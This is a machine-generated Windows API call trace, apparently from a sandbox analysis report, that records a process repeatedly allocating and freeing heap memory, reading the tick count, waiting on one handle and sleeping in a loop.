[0181.979] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78120 | out: hHeap=0x2150000) returned 1 [0181.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.010] GetTickCount () returned 0x209786c [0182.010] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e779a0 [0182.010] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.010] GetTickCount () returned 0x209786c [0182.010] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.010] GetTickCount () returned 0x209786c [0182.010] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.010] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e779a0 | out: hHeap=0x2150000) returned 1 [0182.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.078] GetTickCount () returned 0x2098140 [0182.078] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77f60 [0182.079] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.079] GetTickCount () returned 0x2098140 [0182.079] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.079] GetTickCount () returned 0x2098140 [0182.079] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.079] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77f60 | out: hHeap=0x2150000) returned 1 [0182.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.178] GetTickCount () returned 0x2098a34 [0182.178] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e779a0 [0182.179] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.179] GetTickCount () returned 0x2098a44 [0182.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0182.179] GetTickCount () returned 0x2098a44 [0182.179] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0182.179] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e779a0 | out: hHeap=0x2150000) returned 1 [0182.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.182] GetTickCount () returned 0x20992da [0182.182] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77d60 [0182.182] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.182] GetTickCount () returned 0x20992da [0182.182] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0182.183] GetTickCount () returned 0x20992da [0182.183] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0182.183] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77d60 | out: hHeap=0x2150000) returned 1 [0182.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.186] GetTickCount () returned 0x2099b70 [0182.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77d60 [0182.186] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.186] GetTickCount () returned 0x2099b70 [0182.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70980 [0182.186] GetTickCount () returned 0x2099b70 [0182.186] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70980 | out: hHeap=0x2150000) returned 1 [0182.186] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77d60 | out: hHeap=0x2150000) returned 1 [0182.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.189] GetTickCount () returned 0x209a406 [0182.189] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e779a0 [0182.189] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.189] GetTickCount () returned 0x209a406 [0182.189] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.189] GetTickCount () returned 0x209a406 [0182.189] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.189] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e779a0 | out: hHeap=0x2150000) returned 1 [0182.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.257] GetTickCount () returned 0x209acda [0182.257] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77da0 [0182.258] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.258] GetTickCount () returned 0x209acda [0182.258] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70980 [0182.258] GetTickCount () returned 0x209acda [0182.258] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70980 | out: hHeap=0x2150000) returned 1 [0182.258] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77da0 | out: hHeap=0x2150000) returned 1 [0182.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.293] GetTickCount () returned 0x209b59f [0182.293] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78060 [0182.294] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.294] GetTickCount () returned 0x209b59f [0182.294] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70620 [0182.294] GetTickCount () returned 0x209b59f [0182.294] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70620 | out: hHeap=0x2150000) returned 1 [0182.294] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78060 | out: hHeap=0x2150000) returned 1 [0182.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.326] GetTickCount () returned 0x209be54 [0182.326] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e777e0 [0182.326] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.326] GetTickCount () returned 0x209be54 [0182.326] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.326] GetTickCount () returned 0x209be54 [0182.326] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e777e0 | out: hHeap=0x2150000) returned 1 [0182.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.386] GetTickCount () returned 0x209c719 [0182.387] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77920 [0182.387] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.387] GetTickCount () returned 0x209c719 [0182.387] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e706b0 [0182.387] GetTickCount () returned 0x209c719 [0182.387] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e706b0 | out: hHeap=0x2150000) returned 1 [0182.387] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77920 | out: hHeap=0x2150000) returned 1 [0182.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.519] GetTickCount () returned 0x209d03c [0182.519] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77aa0 [0182.519] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.519] GetTickCount () returned 0x209d03c [0182.519] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e706b0 [0182.519] GetTickCount () returned 0x209d03c [0182.519] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e706b0 | out: hHeap=0x2150000) returned 1 [0182.520] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77aa0 | out: hHeap=0x2150000) returned 1 [0182.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.636] GetTickCount () returned 0x209d94f [0182.636] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78520 [0182.636] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.636] GetTickCount () returned 0x209d94f [0182.636] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0182.636] GetTickCount () returned 0x209d94f [0182.636] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0182.636] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78520 | out: hHeap=0x2150000) returned 1 [0182.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.639] GetTickCount () returned 0x209e1e5 [0182.639] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78460 [0182.639] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.639] GetTickCount () returned 0x209e1e5 [0182.639] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70620 [0182.639] GetTickCount () returned 0x209e1e5 [0182.639] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70620 | out: hHeap=0x2150000) returned 1 [0182.639] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78460 | out: hHeap=0x2150000) returned 1 [0182.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.644] GetTickCount () returned 0x209ea7b [0182.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78060 [0182.644] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.644] GetTickCount () returned 0x209ea7b [0182.644] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0182.644] GetTickCount () returned 0x209ea7b [0182.644] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0182.644] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78060 | out: hHeap=0x2150000) returned 1 [0182.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.647] GetTickCount () returned 0x209f311 [0182.647] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77ee0 [0182.647] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.647] GetTickCount () returned 0x209f311 [0182.647] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0182.647] GetTickCount () returned 0x209f311 [0182.647] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0182.647] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77ee0 | out: hHeap=0x2150000) returned 1 [0182.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.650] GetTickCount () returned 0x209fbb6 [0182.650] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78560 [0182.650] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.650] GetTickCount () returned 0x209fbb6 [0182.650] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.650] GetTickCount () returned 0x209fbb6 [0182.650] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.650] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78560 | out: hHeap=0x2150000) returned 1 [0182.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.652] GetTickCount () returned 0x20a044c [0182.653] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77ea0 [0182.653] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.653] GetTickCount () returned 0x20a044c [0182.653] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.653] GetTickCount () returned 0x20a044c [0182.653] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.653] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77ea0 | out: hHeap=0x2150000) returned 1 [0182.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.656] GetTickCount () returned 0x20a0ce2 [0182.656] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77ba0 [0182.656] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.656] GetTickCount () returned 0x20a0ce2 [0182.656] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70620 [0182.656] GetTickCount () returned 0x20a0ce2 [0182.656] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70620 | out: hHeap=0x2150000) returned 1 [0182.656] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77ba0 | out: hHeap=0x2150000) returned 1 [0182.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.659] GetTickCount () returned 0x20a1578 [0182.659] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77ae0 [0182.659] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.659] GetTickCount () returned 0x20a1578 [0182.659] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70980 [0182.659] GetTickCount () returned 0x20a1578 [0182.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70980 | out: hHeap=0x2150000) returned 1 [0182.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77ae0 | out: hHeap=0x2150000) returned 1 [0182.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.662] GetTickCount () returned 0x20a1e0e [0182.662] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77d60 [0182.662] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.662] GetTickCount () returned 0x20a1e0e [0182.662] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0182.662] GetTickCount () returned 0x20a1e0e [0182.662] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0182.662] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77d60 | out: hHeap=0x2150000) returned 1 [0182.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.665] GetTickCount () returned 0x20a26b4 [0182.665] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77b60 [0182.665] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.665] GetTickCount () returned 0x20a26b4 [0182.665] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70620 [0182.665] GetTickCount () returned 0x20a26b4 [0182.665] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70620 | out: hHeap=0x2150000) returned 1 [0182.665] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77b60 | out: hHeap=0x2150000) returned 1 [0182.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.668] GetTickCount () returned 0x20a2f4a [0182.668] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78060 [0182.668] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.668] GetTickCount () returned 0x20a2f4a [0182.668] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0182.668] GetTickCount () returned 0x20a2f4a [0182.668] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0182.668] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78060 | out: hHeap=0x2150000) returned 1 [0182.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.671] GetTickCount () returned 0x20a37e0 [0182.671] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77d60 [0182.671] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.671] GetTickCount () returned 0x20a37e0 [0182.671] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.671] GetTickCount () returned 0x20a37e0 [0182.671] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.671] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77d60 | out: hHeap=0x2150000) returned 1 [0182.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.675] GetTickCount () returned 0x20a4076 [0182.675] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77da0 [0182.675] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.675] GetTickCount () returned 0x20a4076 [0182.675] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.675] GetTickCount () returned 0x20a4076 [0182.675] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.675] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77da0 | out: hHeap=0x2150000) returned 1 [0182.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.679] GetTickCount () returned 0x20a490c [0182.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77f20 [0182.679] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0182.679] GetTickCount () returned 0x20a490c [0182.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0182.679] GetTickCount () returned 0x20a490c [0182.679] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0182.679] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77f20 | out: hHeap=0x2150000) returned 1 [0182.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0182.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0183.409] GetTickCount () returned 0x20a5480 [0183.409] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e783e0 [0183.409] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0183.409] GetTickCount () returned 0x20a5480 [0183.409] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70620 [0183.409] GetTickCount () returned 0x20a5480 [0183.409] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70620 | out: hHeap=0x2150000) returned 1 [0183.410] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e783e0 | out: hHeap=0x2150000) returned 1 [0183.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0183.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0183.656] GetTickCount () returned 0x20a5e10 [0183.656] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78160 [0183.657] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0183.657] GetTickCount () returned 0x20a5e10 [0183.657] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71d00 [0183.657] GetTickCount () returned 0x20a5e10 [0183.657] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71d00 | out: hHeap=0x2150000) returned 1 [0183.658] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78160 | out: hHeap=0x2150000) returned 1 [0183.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0183.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0183.824] GetTickCount () returned 0x20a6752 [0183.824] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78520 [0183.824] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0183.824] GetTickCount () returned 0x20a6752 [0183.824] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e837f0 [0183.824] GetTickCount () returned 0x20a6752 [0183.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e837f0 | out: hHeap=0x2150000) returned 1 [0183.824] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78520 | out: hHeap=0x2150000) returned 1 [0183.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.102] GetTickCount () returned 0x20a7101 [0184.102] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e783e0 [0184.102] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0184.103] GetTickCount () returned 0x20a7101 [0184.103] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d80 [0184.103] GetTickCount () returned 0x20a7101 [0184.103] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d80 | out: hHeap=0x2150000) returned 1 [0184.103] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e783e0 | out: hHeap=0x2150000) returned 1 [0184.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.228] GetTickCount () returned 0x20a7a14 [0184.228] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78160 [0184.228] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0184.229] GetTickCount () returned 0x20a7a14 [0184.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84810 [0184.229] GetTickCount () returned 0x20a7a14 [0184.229] GetTickCount () returned 0x20a7a14 [0184.229] GetTickCount () returned 0x20a7a14 [0184.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84810 | out: hHeap=0x2150000) returned 1 [0184.229] GetTickCount () returned 0x20a7a14 [0184.229] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d50 [0184.229] GetTickCount () returned 0x20a7a14 [0184.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d50 | out: hHeap=0x2150000) returned 1 [0184.229] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78160 | out: hHeap=0x2150000) returned 1 [0184.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.329] GetTickCount () returned 0x20a8308 [0184.329] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77760 [0184.329] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0184.329] GetTickCount () returned 0x20a8308 [0184.329] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84a80 [0184.329] GetTickCount () returned 0x20a8308 [0184.329] GetTickCount () returned 0x20a8308 [0184.329] GetTickCount () returned 0x20a8308 [0184.329] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84a80 | out: hHeap=0x2150000) returned 1 [0184.329] GetTickCount () returned 0x20a8308 [0184.329] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84a50 [0184.329] GetTickCount () returned 0x20a8308 [0184.329] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84a50 | out: hHeap=0x2150000) returned 1 [0184.329] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77760 | out: hHeap=0x2150000) returned 1 [0184.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0184.386] GetTickCount () returned 0x20a8bdd [0184.386] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78060 [0184.386] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0184.386] GetTickCount () returned 0x20a8bdd [0184.386] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b70 [0184.386] GetTickCount () returned 0x20a8bdd [0184.386] GetTickCount () returned 0x20a8bdd [0184.386] GetTickCount () returned 0x20a8bdd [0184.386] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84b70 | out: hHeap=0x2150000) returned 1 [0184.386] GetTickCount () returned 0x20a8bdd [0184.386] RtlAllocateHeap (HeapHandle=0x2150000, 